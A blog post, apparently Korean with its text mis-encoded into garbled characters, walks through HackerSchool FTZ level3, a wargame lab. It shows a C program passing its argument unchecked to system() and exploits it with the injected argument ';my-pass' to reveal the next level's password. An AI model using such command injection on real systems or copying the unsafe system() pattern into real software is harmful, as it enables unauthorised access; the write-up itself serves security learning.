๐Ÿ”’ CTF (Dreamhack)/System Hacking (์‹œ์Šคํ…œํ•ดํ‚น)

[HackerSchool] ํ•ด์ปค์Šค์ฟจ FTZ: level3

์„ ๋‹ฌ 2022. 10. 11. 10:23
๋ฐ˜์‘ํ˜•

$ cat hint

[level3@ftz level3]$ cat hint


๋‹ค์Œ ์ฝ”๋“œ๋Š” autodig์˜ ์†Œ์Šค์ด๋‹ค.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
 
int main(int argc, char **argv){
 
    char cmd[100];
 
    if( argc!=2 ){
        printf( "Auto Digger Version 0.9\n" );
        printf( "Usage : %s host\n", argv[0] );
        exit(0);
    }
 
    strcpy( cmd, "dig @" );
    strcat( cmd, argv[1] );
    strcat( cmd, " version.bind chaos txt");
 
    system( cmd );
 
}

์ด๋ฅผ ์ด์šฉํ•˜์—ฌ level4์˜ ๊ถŒํ•œ์„ ์–ป์–ด๋ผ.

more hints.
- ๋™์‹œ์— ์—ฌ๋Ÿฌ ๋ช…๋ น์–ด๋ฅผ ์‚ฌ์šฉํ•˜๋ ค๋ฉด?
- ๋ฌธ์ž์—ด ํ˜•ํƒœ๋กœ ๋ช…๋ น์–ด๋ฅผ ์ „๋‹ฌํ•˜๋ ค๋ฉด?

 

์ด๋ฒˆ ํžŒํŠธ์—๋Š” autodig ๋ผ๋Š” ํŒŒ์ผ์„ ์ด์šฉํ•ด์•ผํ•˜๋Š”๋ฐ,

์ด ํŒŒ์ผ์˜ ์ฝ”๋“œ (c์–ธ์–ด)๋ฅผ ์ดํ•ดํ•ด์•ผํ•œ๋‹ค.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
 
int main(int argc, char **argv){
// ์‚ฌ์šฉ์ž์—๊ฒŒ ์ •์ˆ˜์™€ ๋ฌธ์ž์—ด์„ ์ž…๋ ฅ๋ฐ›๋Š”๋‹ค
 
    char cmd[100];
 
    if( argc!=2 ){
    // ์ •์ˆ˜๊ฐ€ 2๊ฐ€ ์•„๋‹ˆ๋ผ๋ฉด ์•„๋ž˜ ๋‚ด์šฉ ์ถœ๋ ฅํ›„ ์ข…๋ฃŒ
        printf( "Auto Digger Version 0.9\n" );
        printf( "Usage : %s host\n", argv[0] );
        exit(0);
    }
 
    strcpy( cmd, "dig @" );
    strcat( cmd, argv[1] );
    strcat( cmd, " version.bind chaos txt");
    // cmd = dig@{์‚ฌ์šฉ์ž๊ฐ€์ž…๋ ฅํ•œ๋ฌธ์ž}version.bind chaos txt

    system( cmd );
    // cmd๋ฅผ ๋ช…๋ น์–ด๋กœ ์‹คํ–‰
 
}

 

์ด ํŒŒ์ผ์„ ์‹คํ–‰ํ• ๋•Œ ์ธ์ž๋งŒ ์ ์ ˆํžˆ ์กฐ์ž‘ํ•˜๋ฉด ์›ํ•˜๋Š” ๋ช…๋ น์–ด๋ฅผ ์‹คํ–‰๊ฐ€๋Šฅํ•˜๋‹ค.

์šฐ๋ฆฌ๋Š” my-pass ๋ผ๋Š” ๋ช…๋ น์–ด๋งŒ ์‹คํ–‰ํ•˜๋ฉด ๋œ๋‹ค.

 

์ผ๋‹จ autodig ๋ฅผ ์ฐพ์ž

$ find / -user level4

[level3@ftz level3]$ find / -user level4
find: /lost+found: Permission denied
find: /boot/lost+found: Permission denied
find: /proc/1/fd: Permission denied
...
/bin/autodig
...
find: /home/trainer7: Permission denied
find: /home/trainer8: Permission denied
find: /home/trainer9: Permission denied

 

bin ์œผ๋กœ ์ด๋™ํ•˜๊ณ  autodig๋ฅผ ์‹คํ–‰ํ•ด๋ณด์ž

$ cd /bin

$ ./autodig

[level3@ftz level3]$ cd /bin
[level3@ftz bin]$ ./autodig
Auto Digger Version 0.9
Usage : ./autodig host

argc๊ฐ€ 2๊ฐ€ ์•„๋‹ˆ๋ฏ€๋กœ ์ฝ”๋“œ๋‚ด์— ์žˆ๋˜ ๋‚ด์šฉ์ด ์ถœ๋ ฅ๋˜๊ณ  ์ข…๋ฃŒ๋˜์—ˆ๋‹ค.

 

autodig ํŒŒ์ผ์„ ํ•œ๋ฒˆ๋งŒ ๋” ์‚ดํŽด๋ณด์ž

strcpy( cmd, "dig @" );
strcat( cmd, argv[1] );
strcat( cmd, " version.bind chaos txt");
// cmd = dig@{์‚ฌ์šฉ์ž๊ฐ€์ž…๋ ฅํ•œ๋ฌธ์ž}version.bind chaos txt

๋ณธ ํŒŒ์ผ์—์„œ๋Š” ์‚ฌ์šฉ์ž๊ฐ€ ์ž…๋ ฅํ•œ ๋ฌธ์ž์—ด์„ ํฌํ•จํ•œ ๋ช…๋ น์–ด๋ฅผ ์‹คํ–‰ํ•œ๋‹ค.

dig@~๋กœ ์‹œ์ž‘ํ•˜๋Š” ๋ช…๋ น์–ด๋Š” ๊ทธ๋ƒฅ ์ข…๋ฃŒ์‹œ์ผœ๋ฒ„๋ฆฌ๊ณ , my-pass๊ฐ€ ์‹คํ–‰๋˜๊ฒŒ ํ•˜๋ฉด ๋œ๋‹ค.

์„ธ๋ฏธ์ฝœ๋ก ์„ ๋„ฃ์œผ๋ฉด ์•ž ๋ช…๋ น์–ด๋ฅผ ์‹คํ–‰ํ•˜๊ณ  ๋’ค์— ๋‹ค๋ฅธ ๋ช…๋ น์–ด๋ฅผ ๋˜ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ๋‹ค

 

cmd = dig@;my-pass version.bind chaos txt ์ด๋ ‡๊ฒŒ !!

 

์ฆ‰ ์ธ์ž๋กœ ";my-pass"๋ผ๋Š” ๋ฌธ์ž์—ด์„ ์ „๋‹ฌํ•ด์ฃผ๋ฉด ํ•ด๋‹น ํŒŒ์ผ์ด ์•Œ์•„์„œ ๋‚ด๊ฐ€ ์›ํ•˜๋Š” ๋ช…๋ น์–ด๋ฅผ ์‹คํ–‰ํ•˜๊ฒŒ ๋œ๋‹ค.

 

$ ./autodig ";my-pass"

[level3@ftz bin]$ ./autodig ";my-pass"
dig: Couldn't find server '': Name or service not known
...

dig@; ์— ๋Œ€ํ•œ ๋ช…๋ น ์‹คํ–‰ ๊ฒฐ๊ณผ๋กœ Couldn't find server '': Name or service not known ์ด๋ผ๋Š” ๋‚ด์šฉ์ด ์ถœ๋ ฅ๋˜์—ˆ๊ณ 

์ด์–ด์„œ my-pass ์— ๋Œ€ํ•œ ๋ช…๋ น ์‹คํ–‰ ๊ฒฐ๊ณผ๋กœ ํŒจ์Šค์›Œ๋“œ๊ฐ€ ์ถœ๋ ฅ๋œ๋‹ค.

๋”๋ณด๊ธฐ
[level3@ftz bin]$ ./autodig ";my-pass"
dig: Couldn't find server '': Name or service not known

Level4 Password is "suck my brain".
๋ฐ˜์‘ํ˜•